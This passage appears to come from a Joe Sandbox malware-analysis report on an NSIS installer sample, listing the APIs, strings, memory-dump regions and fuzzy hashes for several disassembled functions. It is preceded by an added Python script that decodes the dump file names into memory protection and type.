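Every record above lists the same set of memory dump sources, and their file names carry the facts an analyst actually wants: which region of process 21 was executable when the snapshot was taken, and which were data. The script below is an added example written for this page, not Joe Sandbox's own tooling, that decodes those names. The field layout (pid, round, dump id, base, protection, type, two undecoded fields) is an assumption inferred from this report: the source file 00000015.00000002.…0000000000401000… sits beside the snapshot name hcaresult_21_2_400000_…, so the first field reads as the pid in hex (0x15 = 21) and the second as the dump round. Protection and memory type are decoded against the winnt.h constants, which is why the region at 0x401000 with 00000020 (PAGE_EXECUTE_READ) is the one the disassembly comes from, while the image base at 0x400000 with 00000002 (PAGE_READONLY) and the 0x412000 region with 00000004 (PAGE_READWRITE) are not. Fields six and eight are kept raw because the page does not say what they mean. The sample names are copied from the record above; the "Download File" suffix on two of them reproduces the link text that HTML extraction glues onto the names.

```python
"""Decode Joe Sandbox .sdmp memory-dump file names into readable region facts.

Assumed (hypothetical) field layout, inferred from this report:
  pid.round.dumpid.base.protect.f6.type.f8.sdmp
pid, round, base, protect and type are zero-padded hex; dumpid is decimal;
f6 and f8 are kept raw because their meaning is not stated on the page.
"""
import re
from dataclasses import dataclass

# Windows page-protection constants (winnt.h)
PAGE_PROTECTION = {
    0x01: "PAGE_NOACCESS",
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXECUTABLE_MASK = 0x10 | 0x20 | 0x40 | 0x80

# Windows memory-type constants (winnt.h)
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

_SDMP_RE = re.compile(
    r"^(?P<pid>[0-9A-Fa-f]{8})\.(?P<round>[0-9A-Fa-f]{8})\.(?P<dumpid>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.(?P<f6>[0-9A-Fa-f]{8})\."
    r"(?P<memtype>[0-9A-Fa-f]{8})\.(?P<f8>[0-9A-Fa-f]{8})\.sdmp$"
)


@dataclass(frozen=True)
class DumpRegion:
    pid: int
    dump_round: int
    dump_id: int
    base: int
    protect: int
    mem_type: int
    raw_f6: str
    raw_f8: str

    @property
    def protect_name(self) -> str:
        # PAGE_GUARD (0x100) and PAGE_NOCACHE (0x200) are modifier bits; ignore them
        return PAGE_PROTECTION.get(self.protect & 0xFF, f"0x{self.protect:x}")

    @property
    def type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, f"0x{self.mem_type:x}")

    @property
    def executable(self) -> bool:
        return bool(self.protect & EXECUTABLE_MASK)


def parse_sdmp(name: str) -> DumpRegion:
    """Parse one dump file name. Tolerates the 'Download File' link text that
    HTML extraction of the report glues onto the end of the name."""
    name = name.strip()
    if name.endswith("Download File"):
        name = name[: -len("Download File")]
    m = _SDMP_RE.match(name)
    if not m:
        raise ValueError(f"not a recognised sdmp name: {name!r}")
    return DumpRegion(
        pid=int(m["pid"], 16),
        dump_round=int(m["round"], 16),
        dump_id=int(m["dumpid"]),
        base=int(m["base"], 16),
        protect=int(m["protect"], 16),
        mem_type=int(m["memtype"], 16),
        raw_f6=m["f6"],
        raw_f8=m["f8"],
    )


def executable_regions(names):
    """Base addresses of every region with an executable protection, sorted.
    These are the dumps worth loading into a disassembler first."""
    return sorted(r.base for r in map(parse_sdmp, names) if r.executable)


def layout(names):
    """One 'base protection type' line per region, in address order."""
    regions = sorted(map(parse_sdmp, names), key=lambda r: r.base)
    return [f"{r.base:08x} {r.protect_name} {r.type_name}" for r in regions]


# Constructed sample: names copied from the record above, two with the
# extraction residue left on deliberately.
SAMPLE_REGIONS = [
    "00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp",
    "00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File",
    "00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmp",
    "00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmp",
    "00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmp",
    "00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmpDownload File",
]

if __name__ == "__main__":
    for line in layout(SAMPLE_REGIONS):
        print(line)
```

Run as a script it prints the six regions in address order; `executable_regions` reduces the same list to the single executable page range at 0x401000, which is where the CloseHandle/SetFileAttributesA/NSIS functions listed in these records were disassembled from. The `based on PE: true` flag on the source line is not encoded in the file name, so it still has to be read from the report itself.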

APIs
• GetDlgItem.USER32 ref: 00405CAA
• SetWindowTextA.USER32 ref: 00405CE6
  • Part of subcall function 00407805: GetDlgItemTextA.USER32 ref: 00407829
  • Part of subcall function 00407D37: CharNextA.USER32(?,?,?,?,?,?,00000000,?,?,?,004042CE), ref: 00407D9F
  • Part of subcall function 00407D37: CharNextA.USER32(?,?,?,?,?,00000000,?,?,?,004042CE), ref: 00407DBE
  • Part of subcall function 00407D37: CharNextA.USER32(?,?,?,00000000,?,?,?,004042CE), ref: 00407DCA
  • Part of subcall function 00407D37: CharPrevA.USER32(?,?,00000000,?,?,?,004042CE), ref: 00407DE5
• GetDiskFreeSpaceA.KERNEL32(00000000,?,?,?,?,?,?,00000000,00000000), ref: 00405FAC
• MulDiv.KERNEL32 ref: 00405FD2
Strings
Memory Dump Source
• Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
Similarity
• API ID: Char$Next$ItemText$DiskFreePrevSpaceWindow
• String ID: .ro$62lP/4uOUYfKA3tfxllnPzQXGLJgRjFKHZbIa8JtXF+oMlF4/GglqDQr8FrkYyAg2UYkxW9kefTa$8_o$A
• API String ID: 2917460849-1690832132
• Opcode ID: 91b2ad515499cbb7123929db81fef6451cd5d901b74e1dc774021900fa226f3b
• Instruction ID: 826313f772001043a55ea6ee256f7e169a774654cc20dc23f9f2a1aa091d3067
• Opcode Fuzzy Hash: 91b2ad515499cbb7123929db81fef6451cd5d901b74e1dc774021900fa226f3b
• Instruction Fuzzy Hash: 5FD128B09087049FDB10EF69D58466EBBF4FF44304F51893EE888A7281D7789985CF9A
Uniqueness

Uniqueness Score: -1.00%

APIs
• lstrlenA.KERNEL32(?,?), ref: 00407EE6
• GetVersion.KERNEL32 ref: 00407F25
• GetSystemDirectoryA.KERNEL32 ref: 00407FC6
• GetWindowsDirectoryA.KERNEL32 ref: 00407FEC
• SHGetSpecialFolderLocation.SHELL32 ref: 00408018
• SHGetPathFromIDListA.SHELL32 ref: 00408073
• CoTaskMemFree.OLE32 ref: 00408084
  • Part of subcall function 00407BE3: wsprintfA.USER32 ref: 00407BFE
Strings
• ., xrefs: 00407F41
• .ro, xrefs: 00407E16
• 62lP/4uOUYfKA3tfxllnPzQXGLJgRjFKHZbIa8JtXF+oMlF4/GglqDQr8FrkYyAg2UYkxW9kefTa, xrefs: 0040809D
Memory Dump Source
• Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
Similarity
• API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrlenwsprintf
• String ID: .$.ro$62lP/4uOUYfKA3tfxllnPzQXGLJgRjFKHZbIa8JtXF+oMlF4/GglqDQr8FrkYyAg2UYkxW9kefTa
• API String ID: 3880481140-1681717863
• Opcode ID: 41294a1091ea11e90413e40e109157ac56239d1e41f9172e6dff61212ac385df
• Instruction ID: afc503830e017d1618816f2a7c40fbe451ee37b9332185e2dde12f9a903aaa14
• Opcode Fuzzy Hash: 41294a1091ea11e90413e40e109157ac56239d1e41f9172e6dff61212ac385df
• Instruction Fuzzy Hash: FB918E71D082149FDB20DF69C9846AEBBF4EF48300F55853EE894A7381D738A845CB9B
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
Similarity
• API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
• String ID:
• API String ID: 2320649405-0
• Opcode ID: 436651d1fa7a69352c8aa546d6959dfb25c3e8832a7e8f8c86c9d969ad2feb6a
• Instruction ID: 1780d8928a2120b8c11af9b20abdfd96f0510a7958c84a0cc1c987df9bbb4b6c
• Opcode Fuzzy Hash: 436651d1fa7a69352c8aa546d6959dfb25c3e8832a7e8f8c86c9d969ad2feb6a
• Instruction Fuzzy Hash: DF3128B09047069BDB10DFA8D988A6BBFE4BF48314F04886DFD94DB251D374D941CB66
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
Similarity
• API ID: CapsCreateDeviceFontIndirectwsprintf
• String ID: H$Z
• API String ID: 1586071882-4221459494
• Opcode ID: 27455819f521efa1bb0910034b69256412d0ed137287a206ce4bf6b66bbb16f2
• Instruction ID: fe53f9027c55cc81bf00ecbd586396b11bfc2b5e7faefd45710aa59a0b9b721a
• Opcode Fuzzy Hash: 27455819f521efa1bb0910034b69256412d0ed137287a206ce4bf6b66bbb16f2
• Instruction Fuzzy Hash: AC218CB29092009FD310BF68DD446AABBF8FB89304F04C97EE088E3251C3B84555CB6A
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
Similarity
• API ID: TextTimerWindowwsprintf
• String ID: 8_o$unpacking data: %d%%$verifying installer: %d%%
• API String ID: 2438957755-4028837044
• Opcode ID: bd030a2e39a026ec07ab4720bfc960c357e51ed8894618a1f4644a08019d69f6
• Instruction ID: 5883a2093b31581e9909bbd4cee83827143d54294f5a20fab69da977af55eaa0
• Opcode Fuzzy Hash: bd030a2e39a026ec07ab4720bfc960c357e51ed8894618a1f4644a08019d69f6
• Instruction Fuzzy Hash: D9015EB0908304AFD710AF24D48525EBFE8EB48355F50C83EE58997281C7B895859B8A
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
Similarity
• API ID: Message$Send$ClientScreen
• String ID: f
• API String ID: 41195575-1993550816
• Opcode ID: f6519dfc4b30f4dc8ba30da0d317b8fe5b2658bb7498cf5162ba835f3d9dec96
• Instruction ID: 922df396bf3e7088f2107368fcd68d656d94b82640ce54d584134d1287f84c7b
• Opcode Fuzzy Hash: f6519dfc4b30f4dc8ba30da0d317b8fe5b2658bb7498cf5162ba835f3d9dec96
• Instruction Fuzzy Hash: 1E2117B0804308EFDB10AFA9D88829EBFF4EF84314F00C91EE99557281D7B98459CF96
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • OleInitialize.OLE32(006F5F38), ref: 00404C28
                                                                                                                              • Part of subcall function 00404BD7: SendMessageA.USER32 ref: 00404C00
                                                                                                                            • OleUninitialize.OLE32(00000000,00000000,?,?,0040651F), ref: 00404C82
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeMessageSendUninitialize
                                                                                                                            • String ID: $ao
                                                                                                                            • API String ID: 2896919175-1642991873
                                                                                                                            • Opcode ID: cc3d3faee6e08fca0d7ac6085a90d3f2df43109a1ff026cd60c170983ae485cb
                                                                                                                            • Instruction ID: 75bd5999431369d77bbf521c9437c267996017c7344dffd01c2583dab3973ae7
                                                                                                                            • Opcode Fuzzy Hash: cc3d3faee6e08fca0d7ac6085a90d3f2df43109a1ff026cd60c170983ae485cb
                                                                                                                            • Instruction Fuzzy Hash: BA01D4F150C200AFE350AF69D844B66BBFCEB84310F41847EEBC5A3390DB38A44187A9
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%